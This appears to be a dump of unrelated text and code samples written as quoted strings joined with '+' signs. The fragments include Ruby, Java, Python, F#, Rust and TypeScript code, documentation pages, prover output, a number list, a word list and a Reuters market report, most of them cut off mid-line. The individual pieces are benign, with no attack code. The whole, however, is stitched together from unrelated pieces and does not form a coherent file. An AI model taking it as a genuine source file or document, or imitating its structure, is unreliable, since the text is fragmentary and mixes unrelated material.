Asciidoctor::PreprocessorReader.new(document, lines, 'file.adoc') }\n let(:document) { Asciidoctor::Document.new(lines) }\n\n subject(:processor) { described_class.new(processor_context) }\n\n let(:a_blob) { double(:Blob, readable_text?: true, data: a_data) }\n let(:a_data) { StringIO.new('include::b.adoc[]') }\n\n let(:lines) { [':max-include-depth: 1000'] + Array.new(10, 'include::a.adoc[]') }\n\n before do\n allow(project.repository).to receive(:blob_at).with(ref, 'a.adoc').and_return(a_blob)\n end\n\n describe '#include_allowed?' do\n it 'allows the first include' do\n expect(processor.send(:include_allowed?, 'foo.adoc', reader)).to be_truthy\n end\n\n it 'allows the Nth include' do\n (max_includes - 1).times { processor.send(:read_blob, ref, 'a.adoc') }\n\n expect(processor.send(:include_allowed?, 'foo.adoc', reader)).to be_truthy\n end\n\n it 'disallows the Nth + 1 include' do\n max_includes.times { processor.send(:read_blob, ref, 'a.adoc') }\n\n expect(processor.send(:include_allowed?, 'foo.adoc', reader)).to be_falsey\n end\n end\nend" +"package net.dreamlu.mica.test.utils;\n\nimport net.dreamlu.mica.core.utils.StringUtil;\nimport org.junit.Assert;\nimport org.junit.Test;\n\nimport java.util.HashMap;\nimport java.util.Map;\n\npublic class StringUtilTest {\n\n\t@Test\n\tpublic void testFormat1() {\n\t\tString str = \"my name is L.cm, and i like Java!\";\n\n\t\tMap<String, Object> param = new HashMap<>();\n\t\tparam.put(\"name\", \"L.cm\");\n\t\tparam.put(\"like\", \"Java\");\n\t\tString msg = StringUtil.format(\"my name is ${ name }, and i like ${ like }!\", param);\n\n\t\tAssert.assertEquals(str, msg);\n\t}\n\n\t@Test\n\tpublic void testFormat2() {\n\t\tString str = \"my name is L.cm 4 years old, and i like Java!\";\n\n\t\tString msg = StringUtil.format(\"my name is {} {} years old, and i like {}!\", \"L.cm\", 4, \"Java\");\n\t\tAssert.assertEquals(str, msg);\n\t}\n\n\t@Test\n\tpublic void testFormat3() {\n\t\tString str = \"my name is L.cm 4 years old, and i like Java,{},{}!\";\n\n\t\tString msg = StringUtil.format(\"my name is {} {} years old, and i like {},{},{}!\", \"L.cm\", 4, \"Java\");\n\t\tAssert.assertEquals(str, msg);\n\t}\n\n\t@Test\n\tpublic void cleanTextTest() {\n\t\tString s = StringUtil.cleanText(null);\n\t\tAssert.assertNull(s);\n\n\t\tString s1 = StringUtil.cleanText(\" 123123;123\\t1\\n2|3,1231`'' \");\n\t\tAssert.assertEquals(s1, \"1231231231231231\");\n\t}\n}" +"ALE\nALL\nALWAYS\nANGKOK\nBABY\nBEYOND\nBOARDS\nBODISCIENCES\nBOERIEN\nBRAND\nBROTHERS\nBROWN\nBUD\nCAVENAGH\nCBTL\nCINEPLE\nCITIBANK\nCONNECTOR\nCOOK\nDIAPERS\nDINING\nDIRECTORY\nDISCOUNTS\nDORAEMAN\nECCO\nERA\nESPLANADE\nEXIT\nFACE\nFIBRE\nFINEST\nFREE\nGIORDAN\nGUCCI\nHAIR\nHEAD\nHOU\nINDIA\nINDIAN\nINTO\nJCB\nKINOKUNIVA\nLEAVES\nLINK\nLONDON\nLOST\nMAARTEN\nMARC\nMARINA\nMASTER\nMONTH\nMORE\nMOVE\nNALE\nNETB\nNOX\nOCEAN\nOPPING\nOPS\nOPTIONS\nORDER\nOUTLET\nPERKINS\nPLAZA\nPOTATOES\nREPUBLIC\nROOK\nSAHI\nSAY\nSEA\nSHOPPING\nSHU\nSINGPOST\nSK-II\nSPA\nSQUARE\nSTATION\nSTERN\nSTICKY\nSTONE\nSTORE\nSWATC\nSWEATS\nTAGH\nTEA\nTEMT\nTHIRSTY\nTHIS\nTIMEWISE\nTOBLERONE\nTOKYO\nTOWER\nTOWN\nTWO\nUNI\nVUITTON\nWAY\nWOOBO\nWORK\nWORKSHOPELEM" +"---\ntitle: \"Data Objects and Data Sources: Manipulation\"\nms.date: \"11/04/2016\"\nhelpviewer_keywords: [\"data objects [MFC], manipulating\", \"data sources [MFC], data operations\", \"data sources [MFC], inserting data\", \"Clipboard [MFC], determining available formats\", \"OLE [MFC], data objects\", \"Clipboard [MFC], passing format information\", \"data sources [MFC], determining available formats\", \"delayed rendering [MFC]\", \"OLE [MFC], data sources\"]\nms.assetid: f7f27e77-bb5d-4131-b819-d71bf929ebaf\n---\n# Data Objects and Data Sources: Manipulation\n\nAfter a data object or data source has been created, you can perform a number of common operations on the data, such as inserting and removing data, enumerating the formats the data is in, and more. This article describes the techniques necessary to complete the most common operations. Topics include:\n\n- [Inserting data into a data source](#_core_inserting_data_into_a_data_source)\n\n- [Determining the formats available in a data object](#_core_determining_the_formats_available_in_a_data_object)\n\n- [Retrieving data from a data object](#_core_retrieving_data_from_a_data_object)\n\n## <a name=\"_core_inserting_data_into_a_data_source\"></a> Inserting Data into a Data Source\n\nHow data is inserted into a data source depends on whether the data is supplied immediately or on demand, and in which medium it is supplied. The possibilities are as follows.\n\n### Supplying Data Immediately (Immediate Rendering)\n\n- Call `COleDataSource::CacheGlobalData` repeatedly for every Clipboard format in which you are supplying data. Pass the Clipboard format to" +"# -*- coding: utf-8 -*-\nimport cherrypy\nimport datetime\nimport dateutil.parser\nimport errno\nfrom functools import wraps\nimport json\nimport os\nimport pytz\nimport re\nimport string\n\nimport girder\nimport girder.events\n\ntry:\n from random import SystemRandom\n random = SystemRandom()\n random.random() # potentially raises NotImplementedError\nexcept NotImplementedError:\n girder.logprint.warning(\n 'WARNING: using non-cryptographically secure PRNG.')\n import random\n\n\ndef parseTimestamp(x, naive=True):\n \"\"\"\n Parse a datetime string using the python-dateutil package.\n\n If no timezone information is included, assume UTC. If timezone information\n is included, convert to UTC.\n\n If naive is True (the default), drop the timezone information such that a\n naive datetime is returned.\n \"\"\"\n dt = dateutil.parser.parse(x)\n if dt.tzinfo:\n dt = dt.astimezone(pytz.utc).replace(tzinfo=None)\n if naive:\n return dt\n else:\n return pytz.utc.localize(dt)\n\n\ndef genToken(length=64):\n \"\"\"\n Use this utility function to generate a random string of a desired length.\n \"\"\"\n return ''.join(random.choice(string.ascii_letters + string.digits)\n for _ in range(length))\n\n\ndef camelcase(value):\n \"\"\"\n Convert a module name or string with underscores and periods to camel case.\n\n :param value: the string to convert\n :type value: str\n :returns: the value converted to camel case.\n \"\"\"\n return ''.join(x.capitalize() if x else '_' for x in\n re.split('[._]+', value))\n\n\ndef mkdir(path, mode=0o777, recurse=True, existOk=True):\n \"\"\"\n Create a new directory or ensure a directory already exists." +"\ufeffnamespace FSharp.Data\n\nopen System.IO\nopen Microsoft.FSharp.Core.CompilerServices\nopen ProviderImplementation.ProvidedTypes\nopen FSharp.Data.SqlClient\nopen System.Text \n\n[<TypeProvider>]\n[<CompilerMessageAttribute(\"This API supports the FSharp.Data.SqlClient infrastructure and is not intended to be used directly from your code.\", 101, IsHidden = true)>]\ntype SqlFileProvider(config : TypeProviderConfig) = \n inherit SingleRootTypeProvider(\n config, \n \"SqlFile\", \n [\n ProvidedStaticParameter(\"Path\", typeof<string>) \n ProvidedStaticParameter(\"ResolutionFolder\", typeof<string>, \"\") \n ProvidedStaticParameter(\"Encoding\", typeof<string>, \"\") \n ])\n\n override __.CreateRootType( assembly, nameSpace, typeName, args) = \n let path, resolutionFolder, encoding = string args.[0], string args.[1], string args.[2]\n\n if Path.GetExtension(path) <> \".sql\" \n then failwith \"Only files with .sql extension are supported\"\n\n let fullPath = \n if Path.IsPathRooted( path)\n then \n path \n else\n let parent = \n if resolutionFolder = \"\" then config.ResolutionFolder \n elif Path.IsPathRooted( resolutionFolder) then resolutionFolder\n else Path.Combine(config.ResolutionFolder, resolutionFolder)\n Path.Combine( parent, path)\n\n let typ = \n lazy \n let t = ProvidedTypeDefinition(assembly, nameSpace, typeName, baseType = Some typeof<obj>, hideObjectMethods = true)\n\n let content = \n if encoding = \"\" \n then File.ReadAllText( fullPath) \n else File.ReadAllText( fullPath, encoding = Encoding.GetEncoding( encoding))\n\n t.AddMember <| ProvidedField.Literal(\"Text\", typeof<string>, content)\n\n t\n\n typ, [| new SingleFileChangeMonitor(fullPath) |]" +"import { lerp, once } from \"../lib/calla\";\nimport { TestCase } from \"../testing/TestCase\";\n\nexport class MathTests extends TestCase {\n test_Lerp0() {\n const start = 0,\n end = 1,\n p = 0,\n actual = lerp(start, end, p),\n expected = 0;\n\n this.isEqualTo(actual, expected);\n }\n test_Lerp1() {\n const start = 0,\n end = 1,\n p = 0.1,\n actual = lerp(start, end, p),\n expected = 0.1;\n\n this.isEqualTo(actual, expected);\n }\n test_Lerp2() {\n const start = 0,\n end = 1,\n p = 0.2,\n actual = lerp(start, end, p),\n expected = 0.2;\n\n this.isEqualTo(actual, expected);\n }\n test_Lerp3() {\n const start = 0,\n end = 1,\n p = 0.3,\n actual = lerp(start, end, p),\n expected = 0.3;\n\n this.isEqualTo(actual, expected);\n }\n test_Lerp4() {\n const start = 0,\n end = 1,\n p = 0.4,\n actual = lerp(start, end, p),\n expected = 0.4;\n\n this.isEqualTo(actual, expected);\n }\n test_Lerp5() {\n const start = 0,\n end = 1,\n p = 0.5,\n actual = lerp(start, end, p),\n expected = 0.5;\n\n this.isEqualTo(actual, expected);\n }\n test_Lerp6() {\n const start = 0,\n end = 1,\n p = 0.6,\n actual = lerp(start, end, p),\n expected = 0.6;\n\n this.isEqualTo(actual, expected);\n }\n test_Lerp7() {\n const start = 0,\n end = 1,\n p = 0.7,\n actual = lerp(start, end, p),\n expected = 0.7;" +"param(\n\t[Parameter(Mandatory=$true)]\n\t[ValidateSet(\"GTA\",\"TAfGT\")]\n\t[string] $flavor\n)\n\n$solutionFile = \".\\GoogleTestAdapter\\GoogleTestAdapter.sln\"\n$gta_guids = @(\n \"E6276CAD-E4C3-4B25-876A-65B265EBFF1A\",\n \"17F4B73F-E4D3-4E40-98FC-788B1D0F8225\",\n \"87F26371-0005-4301-9C49-A6DF4F06B81C\",\n \"4735D8CC-FA30-432D-854C-2984A7DA5DD2\"\n)\n$tafgt_guids = @(\n\t\"55294B5F-A075-43F2-B0E9-2B11925E8B91\",\n\t\"9041BDED-FA1B-4C17-B7EA-7B750C470C23\",\n\t\"B3AEAD11-8EA3-4AB0-9DB0-643BFAAEB9B2\",\n\t\"483FE0C7-4E8D-4591-BE45-EAC6B2EA5F4F\"\n)\n\n$guids = if ($flavor -eq \"GTA\") { $tafgt_guids } else { $gta_guids }\n$guids_regex = [string]::Join('|', $guids)\n\n$is_processing_project = $false\n(Get-Content $solutionFile) | ForEach-Object {\n if ($is_processing_project) {\n if ($_ -like \"EndProject\") {\n $is_processing_project = $false\n }\n } elseif ($_ -match $guids_regex) {\n if ($_ -like \"Project*\") {\n $is_processing_project = $true\n }\n } else {\n # Add the line to the new sln file if it isn't related to one of our projects\n $_\n }\n} | Set-Content $solutionFile" +"achiever.adb:19:18: info: add a contract to analyze it separately from calling contexts\nachiever.adb:19:18: info: local subprogram \"Do_Something\" only analyzed in the context of calls\nachiever.adb:19:18: warning: subprogram \"Do_Something\" has no effect\nachiever.ads:24:31: warning: unused variable \"St\"\nachiever.ads:25:31: warning: unused variable \"Op\"\nachiever.ads:26:31: warning: unused variable \"Before\"\nachiever.ads:27:31: warning: unused variable \"After\"\nachiever.ads:30:27: warning: unused variable \"St\"\nachiever.ads:31:27: warning: unused variable \"Before\"\nachiever.ads:32:27: warning: unused variable \"After\"\nachiever.ads:35:06: info: complete contract cases proved (CVC4: 1 VC)\nachiever.ads:35:06: info: disjoint contract cases proved (CVC4: 1 VC)\nachiever.ads:36:49: medium: contract case might fail\nachiever.ads:44:45: info: contract case proved (CVC4: 1 VC; Trivial: 1 VC)\nachiever.ads:47:08: info: postcondition proved (CVC4: 1 VC)\nfault_manager.ads:3:14: warning: subprogram \"Log_Direct_Failure\" has no effect\nmain.adb:11:12: medium: \"My_Internal_State\" might not be initialized after elaboration of main program \"Main\"\nmain.adb:11:12: medium: \"achiever.state_item\" might not be initialized after elaboration of main program \"Main\"\nsc_status_type.adb:18:07: info: initialization of \"Result\" proved\nsc_status_type.ads:48:22: info: initialization of \"This\" proved" +"{ lib\n, pythonOlder\n, buildPythonPackage\n, fetchFromGitHub\n # Python Inputs\n, qiskit-aer\n, qiskit-aqua\n, qiskit-ibmq-provider\n, qiskit-ignis\n, qiskit-terra\n # Check Inputs\n, pytestCheckHook\n}:\n\nbuildPythonPackage rec {\n pname = \"qiskit\";\n # NOTE: This version denotes a specific set of subpackages. See https://qiskit.org/documentation/release_notes.html#version-history\n version = \"0.20.0\";\n\n disabled = pythonOlder \"3.5\";\n\n src = fetchFromGitHub {\n owner = \"Qiskit\";\n repo = \"qiskit\";\n rev = version;\n sha256 = \"1r23pjnql49gczf4k4m6ir5rr95gqdxjrks60p8a93d243mxx3c9\";\n };\n\n propagatedBuildInputs = [\n qiskit-aer\n qiskit-aqua\n qiskit-ibmq-provider\n qiskit-ignis\n qiskit-terra\n ];\n\n checkInputs = [ pytestCheckHook ];\n dontUseSetuptoolsCheck = true;\n\n pythonImportsCheck = [\n \"qiskit\"\n \"qiskit.aqua\"\n \"qiskit.circuit\"\n \"qiskit.ignis\"\n \"qiskit.providers.aer\"\n ];\n\n meta = with lib; {\n description = \"Software for developing quantum computing programs\";\n homepage = \"https://qiskit.org\";\n downloadPage = \"https://github.com/QISKit/qiskit/releases\";\n changelog = \"https://qiskit.org/documentation/release_notes.html\";\n license = licenses.asl20;\n maintainers = with maintainers; [ drewrisinger pandaman ];\n };\n}" +"package polyglot.visit;\n\nimport java.util.HashMap;\nimport java.util.Map;\n\nimport polyglot.ast.ConstructorCall;\nimport polyglot.ast.Node;\nimport polyglot.ast.NodeFactory;\nimport polyglot.frontend.Job;\nimport polyglot.types.ConstructorInstance;\nimport polyglot.types.Context;\nimport polyglot.types.SemanticException;\nimport polyglot.types.TypeSystem;\nimport polyglot.util.InternalCompilerError;\n\n/** Visitor which ensures that constructor calls are not recursive. */\npublic class ConstructorCallChecker extends ContextVisitor\n{\n public ConstructorCallChecker(Job job, TypeSystem ts, NodeFactory nf) {\n\tsuper(job, ts, nf);\n }\n\n protected Map constructorInvocations = new HashMap();\n \n protected NodeVisitor enterCall(Node n) throws SemanticException {\n if (n instanceof ConstructorCall) {\n ConstructorCall cc = (ConstructorCall)n;\n if (cc.kind() == ConstructorCall.THIS) {\n // the constructor calls another constructor in the same class\n Context ctxt = context();\n\n if (!(ctxt.currentCode() instanceof ConstructorInstance)) {\n throw new InternalCompilerError(\"Constructor call \" +\n \"occurring in a non-constructor.\", cc.position());\n }\n ConstructorInstance srcCI = (ConstructorInstance)ctxt.currentCode();\n ConstructorInstance destCI = cc.constructorInstance();\n \n constructorInvocations.put(srcCI, destCI);\n while (destCI != null) {\n destCI = (ConstructorInstance)constructorInvocations.get(destCI);\n if (destCI != null && srcCI.equals(destCI)) {\n // loop in the constructor invocations!\n throw new SemanticException(\"Recursive constructor \" +\n \"invocation.\", cc.position());\n }\n }\n }\n }\n return this; \n }\n}" +"{\n \"cells\": [\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"# FloPy\\n\",\n \"\\n\",\n \"### SWI2 Example 4. Upconing Below a Pumping Well in a Two-Aquifer Island System\\n\",\n \"\\n\",\n \"This example problem is the fourth example problem in the SWI2 documentation (http://pubs.usgs.gov/tm/6a46/) and simulates transient movement of the freshwater-seawater interface beneath an island in response to recharge and groundwater withdrawals. The island is 2,050$\\\\times$2,050 m and consists of two 20-m thick aquifers that extend below sea level. The aquifers are confined, storage changes are not considered (all MODFLOW stress periods are steady-state), and the top and bottom of each aquifer is horizontal. The top of the upper aquifer and the bottom of the lower aquifer are impermeable.\\n\",\n \"\\n\",\n \"The domain is discretized into 61 columns, 61 rows, and 2 layers, with respective cell dimensions of 50 m (`DELR`), 50 m (`DELC`), and 20 m. A total of 230 years is simulated using three stress periods with lengths of 200, 12, and 18 years, with constant time steps of 0.2, 0.1, and 0.1 years, respectively. \\n\",\n \"\\n\",\n \"The horizontal and vertical hydraulic conductivity of both aquifers are 10 m/d and 0.2 m/d, respectively. The effective porosity is 0.2 for both aquifers. The" +"16\n2\n52\n0\n8\n0\n79\n3\n5\n2\n26\n0\n24\n13\n36\n13\n46\n2\n0\n0\n45\n56\n25\n0\n49\n14\n9\n45\n62\n3\n15\n71\n41\n44\n56\n23\n0\n0\n0\n0\n0\n4\n2\n2\n34\n45\n0\n42\n0\n44\n79\n3\n2\n5\n90\n0\n3\n14\n0\n2\n26\n1\n14\n69\n28\n91\n0\n47\n0\n57\n14\n0\n41\n52\n12\n18\n57\n0\n75\n4\n80\n38\n18\n0\n3\n0\n4\n42\n8\n69\n0\n0\n0\n88\n11\n39\n39\n53\n36\n5\n2\n86\n45\n0\n2\n4\n2\n0\n0\n2\n88\n34\n2\n21\n42\n68\n15\n71\n0\n2\n8\n21\n38\n35\n0\n0\n32\n81\n1\n2\n0\n0\n4\n0\n2\n40\n0\n0\n88\n36\n71\n86\n0\n63\n0\n15\n30\n22\n2\n52\n68\n2\n33\n60\n48\n0\n19\n2\n19\n55\n2\n10\n45\n45\n20\n0\n22\n25\n13\n3\n46\n18\n0\n2\n0\n0\n2\n2\n3\n0\n0\n0\n35\n5\n24\n20\n56\n7\n0\n65\n76\n42\n22\n14\n22\n0\n2\n2\n5\n54" +"China's stock markets saw heavy turnover on Monday but little change to the key indices as the impact of Deng Xiaoping's death faded and profit-taking set in, analysts said.\nInvestors expect little chance of any political problems emerging to shake the markets, at least for the next few weeks, they said.\n\"It seems to be all very stable,\" said stock analyst Alex Conroy with ING-Barings in Shanghai. \"I expect range trading for a while. There's no particular reason to be trading in a frenzy.\"\nShanghai's domestic A share index edged down 0.77 percent to 1,055.078 points on heavy volume of 1.02 billion shares while the B share index was little changed at 65.707 points, inching up just 0.21 percent against the close on Friday last week.\nIn Shenzhen, the A index rose 0.95 percent to 362.69 points and the B index lost 0.15 percent to 150.73 points.\n\"The markets were under profit-taking pressure after the past two trading days of rises,\" said a Shanghai-based A share dealer with China Guotai Securities.\n\"Institutional speculative buying of heavily-weighted stocks pushed the (Shanghai B share) index up, but most investors took a wait-and-see attitude as Deng's death has been factored in and there" +"\"\"\"\n truncated(d, l, u):\n\nTruncate a distribution between `l` and `u`.\nBuilds the most appropriate distribution for the type of `d`,\nthe fallback is constructing a `Truncated` wrapper.\n\nTo implement a specialized truncated form for a distribution `D`,\nthe method `truncate(d::D, l::T, u::T) where {T <: Real}`\nshould be implemented.\n\n# Arguments\n- `d::UnivariateDistribution`: The original distribution.\n- `l::Real`: The lower bound of the truncation, which can be a finite value or `-Inf`.\n- `u::Real`: The upper bound of the truncation, which can be a finite value of `Inf`.\n\nThrows an error if `l >= u`.\n\"\"\"\nfunction truncated(d::UnivariateDistribution, l::Real, u::Real)\n return truncated(d, promote(l, u)...)\nend\n\nfunction truncated(d::UnivariateDistribution, l::T, u::T) where {T <: Real}\n l < u || error(\"lower bound should be less than upper bound.\")\n T2 = promote_type(T, eltype(d))\n lcdf = isinf(l) ? zero(T2) : T2(cdf(d, l))\n ucdf = isinf(u) ? one(T2) : T2(cdf(d, u))\n tp = ucdf - lcdf\n Truncated(d, promote(l, u, lcdf, ucdf, tp, log(tp))...)\nend\n\ntruncated(d::UnivariateDistribution, l::Integer, u::Integer) = truncated(d, float(l), float(u))\n\n\"\"\"\n Truncated(d, l, u):\n\nCreate a generic wrapper for a truncated distribution.\nPrefer calling the function `truncated(d, l, u)`, which can choose the appropriate\nrepresentation of the truncated distribution.\n\n# Arguments\n- `d::UnivariateDistribution`: The" +"# frozen_string_literal: true\n\nrequire 'ostruct'\n\ndescribe Facter::Resolvers::PosxIdentity do\n before do\n allow(Etc).to receive(:getpwuid)\n .and_return(OpenStruct.new(name: 'test1.test2',\n passwd: '********',\n uid: 501,\n gid: 20,\n gecos: 'Test1 Test2',\n dir: '/Users/test1.test2',\n shell: '/bin/zsh',\n change: 0,\n uclass: '',\n expire: 0))\n\n allow(Etc).to receive(:getgrgid)\n .with(20)\n .and_return(OpenStruct.new(name: 'staff',\n passwd: '*',\n gid: 20,\n mem: ['root', 'test1.test2', '_serialnumberd', 'jenkins']))\n end\n\n shared_examples_for 'a resolved fact' do |fact_name, value|\n subject { Facter::Resolvers::PosxIdentity.resolve(fact_name) }\n\n it { is_expected.to eql(value) }\n end\n\n describe 'GID' do\n it_behaves_like 'a resolved fact', :gid, 20\n end\n\n describe 'GROUP' do\n it_behaves_like 'a resolved fact', :group, 'staff'\n end\n\n describe 'PRIVILEGED' do\n it_behaves_like 'a resolved fact', :privileged, false\n end\n\n describe 'UID' do\n it_behaves_like 'a resolved fact', :uid, 501\n end\n\n describe 'USER' do\n it_behaves_like 'a resolved fact', :user, 'test1.test2'\n end\nend" +".. _reconstructing-mailboxes:\n\nReconstructing Mailboxes\n========================\n\nIndividual mailboxes or folders\n-------------------------------\n\nIf you have a mailbox within the filesystem but the folders and/or messages do not show up via IMAP or the cyradm utility, you may need to run ``reconstruct`` on the mailbox. This will rebuild the cyrus.* cache files and add any new folders to the internal cyrus mailbox list.\n\n.. note::\n The ``-k`` switch preserves expunged messages so they can be undeleted if required. Without it, anything expunged will be permanently removed (Applies to Cyrus IMAP 2.3 and below.) On Cyrus IMAP 2.4.0 and above, this is not required as preserving the expunged messages is the only mode of operation.\n\n::\n\n cyrus $ /usr/lib/cyrus-imapd/reconstruct -k -r -f user/jdoe@example.com\n discovered example.com!user.jdoe.Drafts\n discovered example.com!user.jdoe.Trash\n discovered example.com!user.jdoe.Sent\n user/jdoe@example.com\n user/jdoe/Sent@example.com\n user/jdoe/Trash@example.com\n user/jdoe/Drafts@example.com\n\nThe above output shows the 3 sub-folders Sent, Trash and Drafts were found in addition to the top level INBOX. Sub-folders are only detected by the presence of a cyrus.header file.\n\nOnce this has been done, the client will probably need to subscribe to the newly discovered folders.\n\n.. note::\n\n After restoring folders using reconstruct, you may need to recalculate the quota usage for the mailbox since this is not done" +"// run-pass\n// ignore-wasm32\n\n#![feature(decl_macro)]\n\nmacro_rules! returns_isize(\n ($ident:ident) => (\n fn $ident() -> isize;\n )\n);\n\nmacro takes_u32_returns_u32($ident:ident) {\n fn $ident (arg: u32) -> u32;\n}\n\nmacro_rules! emits_nothing(\n () => ()\n);\n\nmacro_rules! emits_multiple(\n () => {\n fn f1() -> u32;\n fn f2() -> u32;\n }\n);\n\nmod defs {\n #[no_mangle] extern fn f1() -> u32 { 1 }\n #[no_mangle] extern fn f2() -> u32 { 2 }\n}\n\nfn main() {\n assert_eq!(unsafe { rust_get_test_int() }, 1);\n assert_eq!(unsafe { rust_dbg_extern_identity_u32(0xDEADBEEF) }, 0xDEADBEEFu32);\n assert_eq!(unsafe { f1() }, 1);\n assert_eq!(unsafe { f2() }, 2);\n}\n\n#[link(name = \"rust_test_helpers\", kind = \"static\")]\nextern {\n returns_isize!(rust_get_test_int);\n takes_u32_returns_u32!(rust_dbg_extern_identity_u32);\n emits_nothing!();\n emits_multiple!();\n}" +"# Collections Plugins Directory\n\nThis directory can be used to ship various plugins inside an Ansible collection. Each plugin is placed in a folder that\nis named after the type of plugin it is in. It can also include the `module_utils` and `modules` directory that\nwould contain module utils and modules respectively.\n\nHere is an example directory of the majority of plugins currently supported by Ansible:\n\n```\n\u2514\u2500\u2500 plugins\n \u251c\u2500\u2500 action\n \u251c\u2500\u2500 become\n \u251c\u2500\u2500 cache\n \u251c\u2500\u2500 callback\n \u251c\u2500\u2500 cliconf\n \u251c\u2500\u2500 connection\n \u251c\u2500\u2500 filter\n \u251c\u2500\u2500 httpapi\n \u251c\u2500\u2500 inventory\n \u251c\u2500\u2500 lookup\n \u251c\u2500\u2500 module_utils\n \u251c\u2500\u2500 modules\n \u251c\u2500\u2500 netconf\n \u251c\u2500\u2500 shell\n \u251c\u2500\u2500 strategy\n \u251c\u2500\u2500 terminal\n \u251c\u2500\u2500 test\n \u2514\u2500\u2500 vars\n```\n\nA full list of plugin types can be found at [Working With Plugins](https://docs.ansible.com/ansible/2.9/plugins/plugins.html)." +"# Release Leads\n\nFor each release cycle, we dedicate a team of two individuals, one from Eventing\nand one from Serving, to shepherd the release process. Participation is\nvoluntary and based on good faith. We are only expected to participate during\nour local office hour.\n\n# Roster\n\nWe seed this rotation with all approvers from all the Serving and Eventing\nworkgroups, excluding productivity. If you are no longer active in Knative, or\nif you are contributing on personal capacity and do not have time to contribute\nin the rotation, feel free to send a PR to remove yourself.\n\n## Serving roster\n\nThis roster is seeded with all approvers from Serving workgroups.\n\n- dprotaso\n- julz\n- JRBANCEL\n- markusthoemmes\n- mattmoor\n- nak3\n- tcnghia\n- vagababov\n- yanweiguo\n- ZhiminXiang\n\n## Eventing roster\n\nThis roster is seeded with all approvers from Eventing workgroups.\n\n- evankanderson\n- grantr\n- Harwayne\n- lionelvillard\n- matzew\n- n3wscott\n- nachocano\n- slinkydeveloper\n- vaikas\n\n## Schedule\n\n| Release | Release Date | Serving | Eventing | Unpin repos | PKG cut |\n| ------- | ------------ | -------------- | --------------- | ----------- | ---------- |\n| v0.17 | 2020-08-18 | yanweiguo |" +"# Building forms with FormState\n\n## Basic\n\nWhen using `<FormState>`, you express your form's component tree as a function of the generated field state objects provided by `<FormState />` into its `children` function as `formDetails`.\n\n```typescript\ninterface FormDetails<Fields> {\n fields: FieldDescriptors<Fields>;\n dirty: boolean;\n valid: boolean;\n submitting: boolean;\n errors: RemoteError[];\n reset(): void;\n submit(): void;\n}\n```\n\nThe `formDetails` object passed into `children` contains a `fields` dictionary, which includes all the state and handlers you need to render your form.\n\n```typescript\ninterface FieldState<Value> {\n name: string;\n initialValue: Value;\n value: Value;\n dirty: boolean;\n error?: any;\n onBlur(): void;\n}\n```\n\nThe simplest way to use `<FormState />` is to pass it some `initialValues` and render some `input`s in its `children` render prop.\n\n```typescript\nimport FormState from '@shopify/react-form-state';\n\nfunction MyComponent() {\n return (\n <FormState\n initialValues={{\n title: 'Cool title',\n description: 'Cool product',\n }}\n >\n {formDetails => {\n const {fields} = formDetails;\n const {title, description} = fields;\n\n return (\n <form>\n <label htmlFor={title.name}>Title</label>\n <input\n {...title}\n id={title.name}\n onChange={({currentTarget}) => {\n // our onChange expects just a value, no event needed\n title.onChange(currentTarget.value);\n }}\n />\n\n <label htmlFor={description.name}>Title</label>\n <input\n {...description}\n id={title.name}\n onChange={({currentTarget}) => {\n description.onChange(currentTarget.value);\n }}\n />\n </form>\n );\n }}\n </FormState>\n );\n}\n```\n\n## Reducing boilerplate with custom inputs\n\nThe previous" +"package com.smoothnlp.nlp.model.crfpp;\n\nimport java.util.Arrays;\nimport java.util.List;\n\n/**\n * Created by zhifac on 2017/3/18.\n */\npublic class LbfgsOptimizer {\n int iflag_, iscn, nfev, iycn, point, npt, iter, info, ispt, isyt, iypt, maxfev;\n double stp, stp1;\n double[] diag_ = null;\n double[] w_ = null;\n double[] v_ = null;\n double[] xi_ = null;\n Mcsrch mcsrch_ = null;\n\n public void pseudo_gradient(int size,\n double[] v,\n double[] x,\n double[] g,\n double C) {\n for (int i = 0; i < size; ++i) {\n if (x[i] == 0) {\n if (g[i] + C < 0) {\n v[i] = g[i] + C;\n } else if (g[i] - C > 0) {\n v[i] = g[i] - C;\n } else {\n v[i] = 0;\n }\n } else {\n v[i] = g[i] + C * Mcsrch.sigma(x[i]);\n }\n }\n }\n\n int lbfgs_optimize(int size,\n int msize,\n double[] x,\n double f,\n double[] g,\n double[] diag,\n double[] w, boolean orthant, double C,\n double[] v, double[] xi, int iflag) {\n double yy = 0.0;\n double ys = 0.0;\n int bound = 0;\n int cp = 0;\n\n if (orthant) {\n pseudo_gradient(size, v, x, g, C);\n }\n\n if (mcsrch_ == null) {\n mcsrch_ = new Mcsrch();\n }\n\n boolean firstLoop = true;\n\n // initialization\n if (iflag == 0) {" +"import {\n ApolloServerPlugin,\n GraphQLRequestListener,\n} from 'apollo-server-plugin-base';\nimport { GraphQLRequestContext, GraphQLResponse } from 'apollo-server-types';\nimport { KeyValueCache, PrefixingKeyValueCache } from 'apollo-server-caching';\nimport { ValueOrPromise } from 'apollo-server-types';\nimport { CacheHint, CacheScope } from 'apollo-cache-control';\n\n// XXX This should use createSHA from apollo-server-core in order to work on\n// non-Node environments. I'm not sure where that should end up ---\n// apollo-server-sha as its own tiny module? apollo-server-env seems bad because\n// that would add sha.js to unnecessary places, I think?\nimport { createHash } from 'crypto';\n\ninterface Options<TContext = Record<string, any>> {\n // Underlying cache used to save results. All writes will be under keys that\n // start with 'fqc:' and are followed by a fixed-size cryptographic hash of a\n // JSON object with keys representing the query document, operation name,\n // variables, and other keys derived from the sessionId and extraCacheKeyData\n // hooks. If not provided, use the cache in the GraphQLRequestContext instead\n // (ie, the cache passed to the ApolloServer constructor).\n cache?: KeyValueCache;\n\n // Define this hook if you're setting any cache hints with scope PRIVATE.\n // This should return a session ID if the user is \"logged in\", or null if\n // there is no \"logged in\"" +"\"\"\" An example of how to use Chaco to render a visual Traits UI editor.\nThis particular editor allows the user to set two endpoints of an\ninterval.\n\"\"\"\n\n\nfrom traits.etsconfig.api import ETSConfig\nif ETSConfig.toolkit == 'wx':\n from traitsui.wx.editor import Editor\nelse:\n from traitsui.qt4.editor import Editor\n\nfrom traitsui.editor_factory import EditorFactory\n\nfrom enable.window import Window\nfrom enable.api import ColorTrait\n\nfrom chaco.api import OverlayPlotContainer, create_line_plot, \\\n LinePlot\nfrom chaco.tools.api import RangeSelection, RangeSelectionOverlay\n\nfrom traits.api import Int, TraitType, Instance, Float\n\nfrom math import pi\n\n\nclass Interval(TraitType):\n \"\"\"Trait that represents an interval.\n\n \"\"\"\n info_text = \"an interval (x,y) where x < y\"\n\n def __init__(self, low=0, high=1, **metadata):\n value = (low, high)\n TraitType.__init__(self, value, **metadata)\n self.value = (low, 